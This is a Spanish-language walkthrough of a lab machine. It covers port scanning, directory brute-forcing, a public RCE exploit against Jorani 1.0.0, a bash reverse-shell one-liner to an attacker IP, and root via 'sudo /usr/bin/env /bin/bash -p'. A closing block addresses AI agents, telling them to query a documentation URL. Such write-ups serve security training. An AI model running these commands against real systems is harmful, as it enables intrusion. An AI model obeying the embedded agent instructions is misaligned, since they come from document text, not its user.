# MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env') Enumere los puertos abiertos de la ip. ![](/files/kXPRecz49Tpf8HRKvh4w) ``` nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn 192.168.143.109 -G Basicscan.txt ``` Realice un reconocimiento de los servicios de los puertos y un escaneo para verificar sus versiones. ![](/files/mGxx2s9UDYAKqMsg61Oa) ``` nmap -p22,80 -sCV 192.168.143.109 -oN fullscan.txt ``` Verifique el contenido del servidor web (puerto 80) y me encontré con el panel de apache por defecto. Seguido ejecute gobuster para encontrar directorios ocultos dentro de la web. ``` gobuster dir -u http://192.168.143.109 -w /usr/share/wordlists/seclists/Discovery/We ``` ![](/files/JEOE7VnYuenFkWJawHNL) En el directorio sql encontré archivos con contenido interesante como el siguiente. ![](/files/JRqV4xZt9oacfhl0PivM) Busque que era esto y encontré un panel de sesión en google. ![](/files/VkdqU45pPdlElfQWqXXv) Luego busque si en la web existe este panel de sesión, por lo que al agregarle la ruta /session/login automáticamente me envió a esta web. ![](/files/ChcjugEHuCEyBBfVdJqO) Logre identificar que abajo a la derecha esta la version de este aplicativo (jorani v 1.0.0) ![](/files/fi7ZvJukjjTd0ut5oQxo) En google busque algún exploit aprovechando la versión encontrándome con el siguiente. ![](/files/Sd9nffjBXatznG2Ax5I0) Esta version es vulnerable a RCE, por lo en github encontré un repositorio para poder ejecutar esta vulnerabilidad. ![](/files/clXZ5OutHKjRNWp3ufxg) ![](/files/dFEsqWgtatUXeVbaBvo5) Este exploit se ejecuta de la siguiente manera. ``` python3 exploit.py http://192.168.143.109 ``` Una vez que ejecute el exploit utilice le comando 'whoami' para verificar si me devuelve una respuesta. ![](/files/omwwuUGi7ZGntp5lVHu3) Como funciono atreves de una revershell establecí una conexión mas estable con mi maquina kali. ![](/files/u3LT1FYsHaZUo1ZUT1b3) ![](/files/VcUCMSwRvsqJ8mfIlUbH) ``` bash -c "bash -i >& /dev/tcp/192.168.45.233/443 0>&1" ``` Dentro de la maquina busque información sobre ella. ![](/files/aOvqlPoN37OZ7Cb3W84Y) ![](/files/HyxGMtcwt1eO4y4kQVER) ![](/files/pW2Mq4BDga3RRCtGhRgo) ![](/files/Gy3z19ebV19kT5H7yIu7) ![](/files/ssz1q9TwdrTrKMXHiO7z) Ejecute el comando sudo -l y observe que el binario /usr/bin/env no requiere contraseñas. ![](/files/s8f9CZkNNHEvqKxPr6cn) En la pagina gtfobin se encuentre la forma de abusar de este binario para escalar privilegios. ``` sudo /usr/bin/env /bin/bash -p ``` ![](/files/rlFxiSfH4VIEzb7oGXNz) Root. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-jordak-web-rce-jordani-1.0.0-+-privesc-env.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.